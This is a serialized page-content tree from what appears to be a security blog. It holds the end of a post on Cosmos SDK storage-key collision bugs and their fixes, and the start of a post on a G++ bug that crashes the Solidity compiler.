6},{"style":369},[95407],{"type":30,"value":34503},{"type":24,"tag":301,"props":95409,"children":95410},{"style":359},[95411],{"type":30,"value":377},{"type":24,"tag":301,"props":95413,"children":95414},{"style":369},[95415],{"type":30,"value":55155},{"type":24,"tag":301,"props":95417,"children":95418},{"style":385},[95419],{"type":30,"value":83129},{"type":24,"tag":301,"props":95421,"children":95422},{"style":369},[95423],{"type":30,"value":95424}," hex",{"type":24,"tag":301,"props":95426,"children":95427},{"style":359},[95428],{"type":30,"value":206},{"type":24,"tag":301,"props":95430,"children":95431},{"style":314},[95432],{"type":30,"value":95433},"Decode",{"type":24,"tag":301,"props":95435,"children":95436},{"style":359},[95437],{"type":30,"value":362},{"type":24,"tag":301,"props":95439,"children":95440},{"style":369},[95441],{"type":30,"value":92174},{"type":24,"tag":301,"props":95443,"children":95444},{"style":359},[95445],{"type":30,"value":377},{"type":24,"tag":301,"props":95447,"children":95448},{"style":369},[95449],{"type":30,"value":95387},{"type":24,"tag":301,"props":95451,"children":95452},{"style":359},[95453],{"type":30,"value":541},{"type":24,"tag":301,"props":95455,"children":95456},{"style":466},[95457],{"type":30,"value":584},{"type":24,"tag":301,"props":95459,"children":95460},{"style":359},[95461],{"type":30,"value":62163},{"type":24,"tag":301,"props":95463,"children":95464},{"class":303,"line":619},[95465,95469,95473,95477,95481],{"type":24,"tag":301,"props":95466,"children":95467},{"style":308},[95468],{"type":30,"value":3285},{"type":24,"tag":301,"props":95470,"children":95471},{"style":369},[95472],{"type":30,"value":55255},{"type":24,"tag":301,"props":95474,"children":95475},{"style":385},[95476],{"type":30,"value":71098},{"type":24,"tag":301,"props":95478,"children":95479},{"style":348},[95480],{"type":30,"value":88623},{"type":24,"tag":301,"props":95482,"children":95483},{"style":359},[95484],{"type":30,"value":3035},{"type":24,"tag":301,"props":95486,"children":95487},{"class":303,"line":635},[95488,95492,95496,95500],{"type":24,"tag":301,"props":95489,"children":95490},{"style":308},[95491],{"type":30,"value":85788},{"type":24,"tag":301,"props":95493,"children":95494},{"style":348},[95495],{"type":30,"value":88623},{"type":24,"tag":301,"props":95497,"children":95498},{"style":359},[95499],{"type":30,"value":377},{"type":24,"tag":301,"props":95501,"children":95502},{"style":369},[95503],{"type":30,"value":90344},{"type":24,"tag":301,"props":95505,"children":95506},{"class":303,"line":643},[95507],{"type":24,"tag":301,"props":95508,"children":95509},{"style":359},[95510],{"type":30,"value":3345},{"type":24,"tag":301,"props":95512,"children":95513},{"class":303,"line":652},[95514],{"type":24,"tag":301,"props":95515,"children":95516},{"emptyLinePlaceholder":16},[95517],{"type":30,"value":341},{"type":24,"tag":301,"props":95519,"children":95520},{"class":303,"line":666},[95521,95526,95530,95534,95538,95542,95546,95550,95554,95558,95562,95566,95570,95574],{"type":24,"tag":301,"props":95522,"children":95523},{"style":369},[95524],{"type":30,"value":95525}," positionName",{"type":24,"tag":301,"props":95527,"children":95528},{"style":385},[95529],{"type":30,"value":83129},{"type":24,"tag":301,"props":95531,"children":95532},{"style":314},[95533],{"type":30,"value":92267},{"type":24,"tag":301,"props":95535,"children":95536},{"style":359},[95537],{"type":30,"value":95357},{"type":24,"tag":301,"props":95539,"children":95540},{"style":10246},[95541],{"type":30,"value":91469},{"type":24,"tag":301,"props":95543,"children":95544},{"style":359},[95545],{"type":30,"value":377},{"type":24,"tag":301,"props":95547,"children":95548},{"style":369},[95549],{"type":30,"value":92340},{"type":24,"tag":301,"props":95551,"children":95552},{"style":359},[95553],{"type":30,"value":206},{"type":24,"tag":301,"props":95555,"children":95556},{"style":314},[95557],{"type":30,"value":95378},{"type":24,"tag":301,"props":95559,"children":95560},{"style":359},[95561],{"type":30,"value":362},{"type":24,"tag":301,"props":95563,"children":95564},{"style":369},[95565],{"type":30,"value":95387},{"type":24,"tag":301,"props":95567,"children":95568},{"style":359},[95569],{"type":30,"value":541},{"type":24,"tag":301,"props":95571,"children":95572},{"style":466},[95573],{"type":30,"value":546},{"type":24,"tag":301,"props":95575,"children":95576},{"style":359},[95577],{"type":30,"value":95400},{"type":24,"tag":301,"props":95579,"children":95580},{"class":303,"line":674},[95581,95585,95589,95593,95597,95601,95605,95609,95613,95617,95621,95625,95629,95633],{"type":24,"tag":301,"props":95582,"children":95583},{"style":369},[95584],{"type":30,"value":34503},{"type":24,"tag":301,"props":95586,"children":95587},{"style":359},[95588],{"type":30,"value":377},{"type":24,"tag":301,"props":95590,"children":95591},{"style":369},[95592],{"type":30,"value":55155},{"type":24,"tag":301,"props":95594,"children":95595},{"style":385},[95596],{"type":30,"value":83129},{"type":24,"tag":301,"props":95598,"children":95599},{"style":369},[95600],{"type":30,"value":95424},{"type":24,"tag":301,"props":95602,"children":95603},{"style":359},[95604],{"type":30,"value":206},{"type":24,"tag":301,"props":95606,"children":95607},{"style":314},[95608],{"type":30,"value":95433},{"type":24,"tag":301,"props":95610,"children":95611},{"style":359},[95612],{"type":30,"value":362},{"type":24,"tag":301,"props":95614,"children":95615},{"style":369},[95616],{"type":30,"value":92443},{"type":24,"tag":301,"props":95618,"children":95619},{"style":359},[95620],{"type":30,"value":377},{"type":24,"tag":301,"props":95622,"children":95623},{"style":369},[95624],{"type":30,"value":95387},{"type":24,"tag":301,"props":95626,"children":95627},{"style":359},[95628],{"type":30,"value":541},{"type":24,"tag":301,"props":95630,"children":95631},{"style":466},[95632],{"type":30,"value":546},{"type":24,"tag":301,"props":95634,"children":95635},{"style":359},[95636],{"type":30,"value":62163},{"type":24,"tag":301,"props":95638,"children":95639},{"class":303,"line":692},[95640,95644,95648,95652,95656],{"type":24,"tag":301,"props":95641,"children":95642},{"style":308},[95643],{"type":30,"value":3285},{"type":24,"tag":301,"props":95645,"children":95646},{"style":369},[95647],{"type":30,"value":55255},{"type":24,"tag":301,"props":95649,"children":95650},{"style":385},[95651],{"type":30,"value":71098},{"type":24,"tag":301,"props":95653,"children":95654},{"style":348},[95655],{"type":30,"value":88623},{"type":24,"tag":301,"props":95657,"children":95658},{"style":359},[95659],{"type":30,"value":3035},{"type":24,"tag":301,"props":95661,"children":95662},{"class":303,"line":3631},[95663,95667,95671,95675],{"type":24,"tag":301,"props":95664,"children":95665},{"style":308},[95666],{"type":30,"value":85788},{"type":24,"tag":301,"props":95668,"children":95669},{"style":348},[95670],{"type":30,"value":88623},{"type":24,"tag":301,"props":95672,"children":95673},{"style":359},[95674],{"type":30,"value":377},{"type":24,"tag":301,"props":95676,"children":95677},{"style":369},[95678],{"type":30,"value":90344},{"type":24,"tag":301,"props":95680,"children":95681},{"class":303,"line":3639},[95682],{"type":24,"tag":301,"props":95683,"children":95684},{"style":359},[95685],{"type":30,"value":3345},{"type":24,"tag":301,"props":95687,"children":95688},{"class":303,"line":3647},[95689],{"type":24,"tag":301,"props":95690,"children":95691},{"emptyLinePlaceholder":16},[95692],{"type":30,"value":341},{"type":24,"tag":301,"props":95694,"children":95695},{"class":303,"line":3685},[95696,95700,95704,95708,95712,95716,95721,95725,95729,95734,95738,95742],{"type":24,"tag":301,"props":95697,"children":95698},{"style":308},[95699],{"type":30,"value":3285},{"type":24,"tag":301,"props":95701,"children":95702},{"style":369},[95703],{"type":30,"value":69354},{"type":24,"tag":301,"props":95705,"children":95706},{"style":359},[95707],{"type":30,"value":377},{"type":24,"tag":301,"props":95709,"children":95710},{"style":369},[95711],{"type":30,"value":85479},{"type":24,"tag":301,"props":95713,"children":95714},{"style":385},[95715],{"type":30,"value":83129},{"type":24,"tag":301,"props":95717,"children":95718},{"style":369},[95719],{"type":30,"value":95720}," values",{"type":24,"tag":301,"props":95722,"children":95723},{"style":359},[95724],{"type":30,"value":541},{"type":24,"tag":301,"props":95726,"children":95727},{"style":369},[95728],{"type":30,"value":92174},{"type":24,"tag":301,"props":95730,"children":95731},{"style":359},[95732],{"type":30,"value":95733},"]; ",{"type":24,"tag":301,"props":95735,"children":95736},{"style":385},[95737],{"type":30,"value":2485},{"type":24,"tag":301,"props":95739,"children":95740},{"style":369},[95741],{"type":30,"value":85479},{"type":24,"tag":301,"props":95743,"children":95744},{"style":359},[95745],{"type":30,"value":3035},{"type":24,"tag":301,"props":95747,"children":95748},{"class":303,"line":3713},[95749,95754,95758,95762,95766,95770,95774,95778,95782,95786,95790],{"type":24,"tag":301,"props":95750,"children":95751},{"style":369},[95752],{"type":30,"value":95753}," values",{"type":24,"tag":301,"props":95755,"children":95756},{"style":359},[95757],{"type":30,"value":541},{"type":24,"tag":301,"props":95759,"children":95760},{"style":369},[95761],{"type":30,"value":92174},{"type":24,"tag":301,"props":95763,"children":95764},{"style":359},[95765],{"type":30,"value":1046},{"type":24,"tag":301,"props":95767,"children":95768},{"style":385},[95769],{"type":30,"value":523},{"type":24,"tag":301,"props":95771,"children":95772},{"style":314},[95773],{"type":30,"value":92267},{"type":24,"tag":301,"props":95775,"children":95776},{"style":359},[95777],{"type":30,"value":362},{"type":24,"tag":301,"props":95779,"children":95780},{"style":348},[95781],{"type":30,"value":73814},{"type":24,"tag":301,"props":95783,"children":95784},{"style":359},[95785],{"type":30,"value":541},{"type":24,"tag":301,"props":95787,"children":95788},{"style":10246},[95789],{"type":30,"value":91872},{"type":24,"tag":301,"props":95791,"children":95792},{"style":359},[95793],{"type":30,"value":62163},{"type":24,"tag":301,"props":95795,"children":95796},{"class":303,"line":3721},[95797],{"type":24,"tag":301,"props":95798,"children":95799},{"style":359},[95800],{"type":30,"value":3345},{"type":24,"tag":301,"props":95802,"children":95803},{"class":303,"line":3751},[95804],{"type":24,"tag":301,"props":95805,"children":95806},{"emptyLinePlaceholder":16},[95807],{"type":30,"value":341},{"type":24,"tag":301,"props":95809,"children":95810},{"class":303,"line":3782},[95811,95816,95820,95824,95828,95832,95836,95840,95844],{"type":24,"tag":301,"props":95812,"children":95813},{"style":369},[95814],{"type":30,"value":95815}," values",{"type":24,"tag":301,"props":95817,"children":95818},{"style":359},[95819],{"type":30,"value":541},{"type":24,"tag":301,"props":95821,"children":95822},{"style":369},[95823],{"type":30,"value":92174},{"type":24,"tag":301,"props":95825,"children":95826},{"style":359},[95827],{"type":30,"value":1756},{"type":24,"tag":301,"props":95829,"children":95830},{"style":369},[95831],{"type":30,"value":92443},{"type":24,"tag":301,"props":95833,"children":95834},{"style":359},[95835],{"type":30,"value":1046},{"type":24,"tag":301,"props":95837,"children":95838},{"style":385},[95839],{"type":30,"value":523},{"type":24,"tag":301,"props":95841,"children":95842},{"style":369},[95843],{"type":30,"value":14241},{"type":24,"tag":301,"props":95845,"children":95846},{"style":359},[95847],{"type":30,"value":3035},{"type":24,"tag":301,"props":95849,"children":95850},{"class":303,"line":3791},[95851,95855,95859,95864,95868,95873],{"type":24,"tag":301,"props":95852,"children":95853},{"style":369},[95854],{"type":30,"value":33706},{"type":24,"tag":301,"props":95856,"children":95857},{"style":359},[95858],{"type":30,"value":5615},{"type":24,"tag":301,"props":95860,"children":95861},{"style":369},[95862],{"type":30,"value":95863},"iterator",{"type":24,"tag":301,"props":95865,"children":95866},{"style":359},[95867],{"type":30,"value":206},{"type":24,"tag":301,"props":95869,"children":95870},{"style":314},[95871],{"type":30,"value":95872},"Value",{"type":24,"tag":301,"props":95874,"children":95875},{"style":359},[95876],{"type":30,"value":10318},{"type":24,"tag":301,"props":95878,"children":95879},{"class":303,"line":3819},[95880],{"type":24,"tag":301,"props":95881,"children":95882},{"style":359},[95883],{"type":30,"value":3345},{"type":24,"tag":301,"props":95885,"children":95886},{"class":303,"line":4397},[95887],{"type":24,"tag":301,"props":95888,"children":95889},{"style":359},[95890],{"type":30,"value":501},{"type":24,"tag":301,"props":95892,"children":95893},{"class":303,"line":4405},[95894,95898],{"type":24,"tag":301,"props":95895,"children":95896},{"style":308},[95897],{"type":30,"value":680},{"type":24,"tag":301,"props":95899,"children":95900},{"style":369},[95901],{"type":30,"value":95902}," values\n",{"type":24,"tag":301,"props":95904,"children":95905},{"class":303,"line":4422},[95906],{"type":24,"tag":301,"props":95907,"children":95908},{"style":359},[95909],{"type":30,"value":698},{"type":24,"tag":32,"props":95911,"children":95912},{},[95913,95915,95921,95922,95928,95930,95935,95937,95942,95944,95949,95951,95956,95958,95964],{"type":30,"value":95914},"By now, you may have already noticed that this implementation suffers from field malleability issues. Imagine a scenario where both ",{"type":24,"tag":145,"props":95916,"children":95918},{"className":95917},[],[95919],{"type":30,"value":95920},"vaultId = 1",{"type":30,"value":2378},{"type":24,"tag":145,"props":95923,"children":95925},{"className":95924},[],[95926],{"type":30,"value":95927},"vaultId = 10",{"type":30,"value":95929}," coexist. If we try to fetch data under ",{"type":24,"tag":145,"props":95931,"children":95933},{"className":95932},[],[95934],{"type":30,"value":95920},{"type":30,"value":95936},", all entries under ",{"type":24,"tag":145,"props":95938,"children":95940},{"className":95939},[],[95941],{"type":30,"value":95927},{"type":30,"value":95943}," will also be returned simply because ",{"type":24,"tag":145,"props":95945,"children":95947},{"className":95946},[],[95948],{"type":30,"value":546},{"type":30,"value":95950}," is a prefix of ",{"type":24,"tag":145,"props":95952,"children":95954},{"className":95953},[],[95955],{"type":30,"value":9505},{"type":30,"value":95957},". To fix this, we must once again append the ",{"type":24,"tag":145,"props":95959,"children":95961},{"className":95960},[],[95962],{"type":30,"value":95963},"Separator",{"type":30,"value":95965}," to the iterator prefix.",{"type":24,"tag":291,"props":95967,"children":95969},{"code":95968,"language":82877,"meta":7,"className":82878,"style":7},"i := sdk.KVStorePrefixIterator(\n kvStore,\n fmt.Sprintf(\"%s%d%s\", PositionMapPrefix, vaultId, Seperator),\n)\n",[95970],{"type":24,"tag":145,"props":95971,"children":95972},{"__ignoreMap":7},[95973,96000,96012,96065],{"type":24,"tag":301,"props":95974,"children":95975},{"class":303,"line":304},[95976,95980,95984,95988,95992,95996],{"type":24,"tag":301,"props":95977,"children":95978},{"style":369},[95979],{"type":30,"value":10564},{"type":24,"tag":301,"props":95981,"children":95982},{"style":385},[95983],{"type":30,"value":83129},{"type":24,"tag":301,"props":95985,"children":95986},{"style":369},[95987],{"type":30,"value":85353},{"type":24,"tag":301,"props":95989,"children":95990},{"style":359},[95991],{"type":30,"value":206},{"type":24,"tag":301,"props":95993,"children":95994},{"style":314},[95995],{"type":30,"value":95159},{"type":24,"tag":301,"props":95997,"children":95998},{"style":359},[95999],{"type":30,"value":1707},{"type":24,"tag":301,"props":96001,"children":96002},{"class":303,"line":320},[96003,96008],{"type":24,"tag":301,"props":96004,"children":96005},{"style":369},[96006],{"type":30,"value":96007}," kvStore",{"type":24,"tag":301,"props":96009,"children":96010},{"style":359},[96011],{"type":30,"value":1729},{"type":24,"tag":301,"props":96013,"children":96014},{"class":303,"line":335},[96015,96020,96024,96028,96032,96037,96041,96045,96049,96053,96057,96061],{"type":24,"tag":301,"props":96016,"children":96017},{"style":369},[96018],{"type":30,"value":96019}," fmt",{"type":24,"tag":301,"props":96021,"children":96022},{"style":359},[96023],{"type":30,"value":206},{"type":24,"tag":301,"props":96025,"children":96026},{"style":314},[96027],{"type":30,"value":91926},{"type":24,"tag":301,"props":96029,"children":96030},{"style":359},[96031],{"type":30,"value":362},{"type":24,"tag":301,"props":96033,"children":96034},{"style":329},[96035],{"type":30,"value":96036},"\"%s%d%s\"",{"type":24,"tag":301,"props":96038,"children":96039},{"style":359},[96040],{"type":30,"value":377},{"type":24,"tag":301,"props":96042,"children":96043},{"style":369},[96044],{"type":30,"value":95209},{"type":24,"tag":301,"props":96046,"children":96047},{"style":359},[96048],{"type":30,"value":377},{"type":24,"tag":301,"props":96050,"children":96051},{"style":369},[96052],{"type":30,"value":94994},{"type":24,"tag":301,"props":96054,"children":96055},{"style":359},[96056],{"type":30,"value":377},{"type":24,"tag":301,"props":96058,"children":96059},{"style":369},[96060],{"type":30,"value":95325},{"type":24,"tag":301,"props":96062,"children":96063},{"style":359},[96064],{"type":30,"value":4656},{"type":24,"tag":301,"props":96066,"children":96067},{"class":303,"line":344},[96068],{"type":24,"tag":301,"props":96069,"children":96070},{"style":359},[96071],{"type":30,"value":791},{"type":24,"tag":32,"props":96073,"children":96074},{},[96075,96077,96082],{"type":30,"value":96076},"At first, identifying these serialization issues may seem easy. Once data structures and ",{"type":24,"tag":145,"props":96078,"children":96080},{"className":96079},[],[96081],{"type":30,"value":91681},{"type":30,"value":96083}," usage grow increasingly more complex, developers can unintentionally overlook storage key parsing mistakes.",{"type":24,"tag":32,"props":96085,"children":96086},{},[96087],{"type":30,"value":96088},"Storage keys continue to be a tedious and persistent issue when building on Cosmos. It is crucial to approach development with awareness and care to prevent bugs from creeping into code.",{"type":24,"tag":80,"props":96090,"children":96092},{"id":96091},"real-world-examples-5",[96093],{"type":30,"value":83401},{"type":24,"tag":32,"props":96095,"children":96096},{},[96097,96098,96103,96105,96112,96114,96120],{"type":30,"value":8079},{"type":24,"tag":145,"props":96099,"children":96101},{"className":96100},[],[96102],{"type":30,"value":85174},{"type":30,"value":96104}," previously lacked protection against KVStore ",{"type":24,"tag":188,"props":96106,"children":96109},{"href":96107,"rel":96108},"https://github.com/cosmos/cosmos-sdk/pull/9363",[192],[96110],{"type":30,"value":96111},"key collisions",{"type":30,"value":96113},". This prior oversight allowed developers to unintentionally create two ",{"type":24,"tag":145,"props":96115,"children":96117},{"className":96116},[],[96118],{"type":30,"value":96119},"KVStores",{"type":30,"value":96121}," that were not independent of each other.",{"type":24,"tag":32,"props":96123,"children":96124},{},[96125],{"type":24,"tag":188,"props":96126,"children":96129},{"href":96127,"rel":96128},"https://github.com/cosmos/cosmos-sdk/blob/25bd118e4cc1d60ab2f9d2e0302d271416551aa9/types/store.go#L108",[192],[96130],{"type":30,"value":83451},{"type":24,"tag":291,"props":96132,"children":96134},{"code":96133,"language":82877,"meta":7,"className":82878,"style":7},"func NewKVStoreKeys(names ...string) map[string]*KVStoreKey {\n keys := make(map[string]*KVStoreKey)\n for _, name := range names {\n keys[name] = NewKVStoreKey(name)\n }\n\n return keys\n}\n",[96135],{"type":24,"tag":145,"props":96136,"children":96137},{"__ignoreMap":7},[96138,96200,96248,96284,96324,96331,96338,96350],{"type":24,"tag":301,"props":96139,"children":96140},{"class":303,"line":304},[96141,96145,96150,96154,96159,96163,96167,96171,96175,96179,96183,96187,96191,96196],{"type":24,"tag":301,"props":96142,"children":96143},{"style":348},[96144],{"type":30,"value":83013},{"type":24,"tag":301,"props":96146,"children":96147},{"style":314},[96148],{"type":30,"value":96149}," NewKVStoreKeys",{"type":24,"tag":301,"props":96151,"children":96152},{"style":359},[96153],{"type":30,"value":362},{"type":24,"tag":301,"props":96155,"children":96156},{"style":369},[96157],{"type":30,"value":96158},"names",{"type":24,"tag":301,"props":96160,"children":96161},{"style":385},[96162],{"type":30,"value":32055},{"type":24,"tag":301,"props":96164,"children":96165},{"style":10246},[96166],{"type":30,"value":36423},{"type":24,"tag":301,"props":96168,"children":96169},{"style":359},[96170],{"type":30,"value":911},{"type":24,"tag":301,"props":96172,"children":96173},{"style":348},[96174],{"type":30,"value":73814},{"type":24,"tag":301,"props":96176,"children":96177},{"style":359},[96178],{"type":30,"value":541},{"type":24,"tag":301,"props":96180,"children":96181},{"style":10246},[96182],{"type":30,"value":36423},{"type":24,"tag":301,"props":96184,"children":96185},{"style":359},[96186],{"type":30,"value":22200},{"type":24,"tag":301,"props":96188,"children":96189},{"style":385},[96190],{"type":30,"value":772},{"type":24,"tag":301,"props":96192,"children":96193},{"style":10246},[96194],{"type":30,"value":96195},"KVStoreKey",{"type":24,"tag":301,"props":96197,"children":96198},{"style":359},[96199],{"type":30,"value":3035},{"type":24,"tag":301,"props":96201,"children":96202},{"class":303,"line":320},[96203,96208,96212,96216,96220,96224,96228,96232,96236,96240,96244],{"type":24,"tag":301,"props":96204,"children":96205},{"style":369},[96206],{"type":30,"value":96207}," keys",{"type":24,"tag":301,"props":96209,"children":96210},{"style":385},[96211],{"type":30,"value":83129},{"type":24,"tag":301,"props":96213,"children":96214},{"style":314},[96215],{"type":30,"value":92267},{"type":24,"tag":301,"props":96217,"children":96218},{"style":359},[96219],{"type":30,"value":362},{"type":24,"tag":301,"props":96221,"children":96222},{"style":348},[96223],{"type":30,"value":73814},{"type":24,"tag":301,"props":96225,"children":96226},{"style":359},[96227],{"type":30,"value":541},{"type":24,"tag":301,"props":96229,"children":96230},{"style":10246},[96231],{"type":30,"value":36423},{"type":24,"tag":301,"props":96233,"children":96234},{"style":359},[96235],{"type":30,"value":22200},{"type":24,"tag":301,"props":96237,"children":96238},{"style":385},[96239],{"type":30,"value":772},{"type":24,"tag":301,"props":96241,"children":96242},{"style":10246},[96243],{"type":30,"value":96195},{"type":24,"tag":301,"props":96245,"children":96246},{"style":359},[96247],{"type":30,"value":791},{"type":24,"tag":301,"props":96249,"children":96250},{"class":303,"line":335},[96251,96255,96259,96263,96267,96271,96275,96280],{"type":24,"tag":301,"props":96252,"children":96253},{"style":308},[96254],{"type":30,"value":3249},{"type":24,"tag":301,"props":96256,"children":96257},{"style":369},[96258],{"type":30,"value":9873},{"type":24,"tag":301,"props":96260,"children":96261},{"style":359},[96262],{"type":30,"value":377},{"type":24,"tag":301,"props":96264,"children":96265},{"style":369},[96266],{"type":30,"value":55232},{"type":24,"tag":301,"props":96268,"children":96269},{"style":385},[96270],{"type":30,"value":83129},{"type":24,"tag":301,"props":96272,"children":96273},{"style":308},[96274],{"type":30,"value":84111},{"type":24,"tag":301,"props":96276,"children":96277},{"style":369},[96278],{"type":30,"value":96279}," names",{"type":24,"tag":301,"props":96281,"children":96282},{"style":359},[96283],{"type":30,"value":3035},{"type":24,"tag":301,"props":96285,"children":96286},{"class":303,"line":344},[96287,96291,96295,96299,96303,96307,96312,96316,96320],{"type":24,"tag":301,"props":96288,"children":96289},{"style":369},[96290],{"type":30,"value":32087},{"type":24,"tag":301,"props":96292,"children":96293},{"style":359},[96294],{"type":30,"value":541},{"type":24,"tag":301,"props":96296,"children":96297},{"style":369},[96298],{"type":30,"value":55232},{"type":24,"tag":301,"props":96300,"children":96301},{"style":359},[96302],{"type":30,"value":1046},{"type":24,"tag":301,"props":96304,"children":96305},{"style":385},[96306],{"type":30,"value":523},{"type":24,"tag":301,"props":96308,"children":96309},{"style":314},[96310],{"type":30,"value":96311}," NewKVStoreKey",{"type":24,"tag":301,"props":96313,"children":96314},{"style":359},[96315],{"type":30,"value":362},{"type":24,"tag":301,"props":96317,"children":96318},{"style":369},[96319],{"type":30,"value":55232},{"type":24,"tag":301,"props":96321,"children":96322},{"style":359},[96323],{"type":30,"value":791},{"type":24,"tag":301,"props":96325,"children":96326},{"class":303,"line":401},[96327],{"type":24,"tag":301,"props":96328,"children":96329},{"style":359},[96330],{"type":30,"value":501},{"type":24,"tag":301,"props":96332,"children":96333},{"class":303,"line":415},[96334],{"type":24,"tag":301,"props":96335,"children":96336},{"emptyLinePlaceholder":16},[96337],{"type":30,"value":341},{"type":24,"tag":301,"props":96339,"children":96340},{"class":303,"line":439},[96341,96345],{"type":24,"tag":301,"props":96342,"children":96343},{"style":308},[96344],{"type":30,"value":680},{"type":24,"tag":301,"props":96346,"children":96347},{"style":369},[96348],{"type":30,"value":96349}," keys\n",{"type":24,"tag":301,"props":96351,"children":96352},{"class":303,"line":447},[96353],{"type":24,"tag":301,"props":96354,"children":96355},{"style":359},[96356],{"type":30,"value":698},{"type":24,"tag":32,"props":96358,"children":96359},{},[96360,96362,96367,96369,96374,96376,96381],{"type":30,"value":96361},"Thanks to the diligence of core developers, checks are now enforced and the ",{"type":24,"tag":145,"props":96363,"children":96365},{"className":96364},[],[96366],{"type":30,"value":85174},{"type":30,"value":96368}," will refuse to run if any ",{"type":24,"tag":145,"props":96370,"children":96372},{"className":96371},[],[96373],{"type":30,"value":91681},{"type":30,"value":96375}," keys are prefix of each other. This implementation alleviates developers from having to worry about key collisions on the ",{"type":24,"tag":145,"props":96377,"children":96379},{"className":96378},[],[96380],{"type":30,"value":91681},{"type":30,"value":96382}," level.",{"type":24,"tag":32,"props":96384,"children":96385},{},[96386,96388,96395],{"type":30,"value":96387},"Additional storage key issues like subtle bugs in the Cosmos-SDK have resulted in ",{"type":24,"tag":188,"props":96389,"children":96392},{"href":96390,"rel":96391},"https://github.com/cosmos/cosmos-sdk/issues/12661",[192],[96393],{"type":30,"value":96394},"incorrect iterator behavior",{"type":30,"value":206},{"type":24,"tag":32,"props":96397,"children":96398},{},[96399,96401,96408],{"type":30,"value":96400},"Notably, gradual adoption of the ",{"type":24,"tag":188,"props":96402,"children":96405},{"href":96403,"rel":96404},"https://github.com/cosmos/cosmos-sdk/tree/def657dafa615cb8e8bb072452663893157e073a/collections",[192],[96406],{"type":30,"value":96407},"collections",{"type":30,"value":96409}," storage helpers since Cosmos v0.50 has made it a lot more difficult to write buggy code. This demonstrates the importance of keeping up to date with the latest SDK development to leverage architectural security improvements.",{"type":24,"tag":43,"props":96411,"children":96412},{"id":9652},[96413],{"type":30,"value":9655},{"type":24,"tag":32,"props":96415,"children":96416},{},[96417],{"type":30,"value":96418},"The Cosmos SDK is a powerful tool for those who want to create custom blockchains. However, this flexibility brings about great responsibility. Developers must pay close attention to nuances, as these can expose a large number of potential attack surfaces.",{"type":24,"tag":32,"props":96420,"children":96421},{},[96422],{"type":30,"value":96423},"To recap, we discussed some of the more basic parts of Cosmos-SDK, showcasing common mistakes developers tend to make. Yet, it is important to note that we've only covered the tip of the iceberg. Other attack surfaces, such as authentications in relation to the IBC interface, are fundamentals absolutely worth looking into.",{"type":24,"tag":9672,"props":96425,"children":96426},{},[96427],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":96429},[96430,96431,96434,96437,96440,96443,96446,96449],{"id":35771,"depth":320,"text":35774},{"id":82594,"depth":320,"text":82597,"children":96432},[96433],{"id":83398,"depth":335,"text":83401},{"id":83994,"depth":320,"text":83997,"children":96435},[96436],{"id":84643,"depth":335,"text":83401},{"id":85140,"depth":320,"text":85143,"children":96438},[96439],{"id":86440,"depth":335,"text":83401},{"id":87777,"depth":320,"text":87780,"children":96441},[96442],{"id":88315,"depth":335,"text":83401},{"id":89834,"depth":320,"text":89837,"children":96444},[96445],{"id":90714,"depth":335,"text":83401},{"id":91667,"depth":320,"text":91670,"children":96447},[96448],{"id":96091,"depth":335,"text":83401},{"id":9652,"depth":320,"text":9655},"content:blog:2025-06-10-cosmos-security.md","blog/2025-06-10-cosmos-security.md","blog/2025-06-10-cosmos-security",{"_path":96454,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":96455,"description":96456,"author":96457,"image":96458,"date":96460,"tags":96461,"isFeatured":16,"onBlogPage":16,"body":96462,"_type":9700,"_id":99167,"_source":9702,"_file":99168,"_stem":99169,"_extension":9705},"/blog/2025-08-11-compiler-bug-causes-compiler-bug","Compiler Bug Causes Compiler Bug: How a 12-Year-Old G++ Bug Took Down Solidity","A subtle G++ bug from 2012, C++20's new comparison rules, and legacy Boost code can collide to crash Solidity's compiler on valid code. We unpack the surprising chain reaction and how to fix it.","kiprey",{"src":96459,"height":15,"width":15},"/posts/compiler-bug-causes-compiler-bug/title.png","2025-08-11",[11299,35766],{"type":21,"children":96463,"toc":99151},[96464,96469,96605,96610,96615,96620,96625,96738,96743,96748,96753,96793,96806,96811,96829,96834,96837,96843,96857,96870,96875,96888,96893,96905,96918,96923,96926,96932,96938,96995,97000,97006,97020,97055,97063,97071,97091,97097,97102,97540,97548,97592,97597,97605,97613,97652,97657,97665,97670,97673,97679,97685,97710,97722,97749,97782,97787,97790,97796,97815,98333,98346,98364,98387,98398,98403,98506,98511,98516,98530,98535,98611,98629,98634,98637,98643,98655,98667,99006,99011,99029,99034,99037,99043,99048,99066,99086,99089,99095,99114,99117,99121,99126,99137,99142,99147],{"type":24,"tag":32,"props":96465,"children":96466},{},[96467],{"type":30,"value":96468},"Compilers aren't supposed to crash — especially not when compiling perfectly valid code like this:",{"type":24,"tag":291,"props":96470,"children":96472},{"code":96471,"language":11299,"meta":7,"className":11300,"style":7},"// SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.25;\n\ncontract A {\n function a() public pure returns (uint256) {\n return 1 ** 2;\n }\n}\n",[96473],{"type":24,"tag":145,"props":96474,"children":96475},{"__ignoreMap":7},[96476,96484,96502,96509,96526,96568,96591,96598],{"type":24,"tag":301,"props":96477,"children":96478},{"class":303,"line":304},[96479],{"type":24,"tag":301,"props":96480,"children":96481},{"style":1062},[96482],{"type":30,"value":96483},"// SPDX-License-Identifier: UNLICENSED\n",{"type":24,"tag":301,"props":96485,"children":96486},{"class":303,"line":320},[96487,96492,96497],{"type":24,"tag":301,"props":96488,"children":96489},{"style":308},[96490],{"type":30,"value":96491},"pragma",{"type":24,"tag":301,"props":96493,"children":96494},{"style":348},[96495],{"type":30,"value":96496}," solidity",{"type":24,"tag":301,"props":96498,"children":96499},{"style":359},[96500],{"type":30,"value":96501}," ^0.8.25;\n",{"type":24,"tag":301,"props":96503,"children":96504},{"class":303,"line":335},[96505],{"type":24,"tag":301,"props":96506,"children":96507},{"emptyLinePlaceholder":16},[96508],{"type":30,"value":341},{"type":24,"tag":301,"props":96510,"children":96511},{"class":303,"line":344},[96512,96517,96522],{"type":24,"tag":301,"props":96513,"children":96514},{"style":348},[96515],{"type":30,"value":96516},"contract",{"type":24,"tag":301,"props":96518,"children":96519},{"style":10246},[96520],{"type":30,"value":96521}," A",{"type":24,"tag":301,"props":96523,"children":96524},{"style":359},[96525],{"type":30,"value":3035},{"type":24,"tag":301,"props":96527,"children":96528},{"class":303,"line":401},[96529,96534,96539,96543,96547,96552,96556,96560,96564],{"type":24,"tag":301,"props":96530,"children":96531},{"style":348},[96532],{"type":30,"value":96533}," function",{"type":24,"tag":301,"props":96535,"children":96536},{"style":314},[96537],{"type":30,"value":96538}," 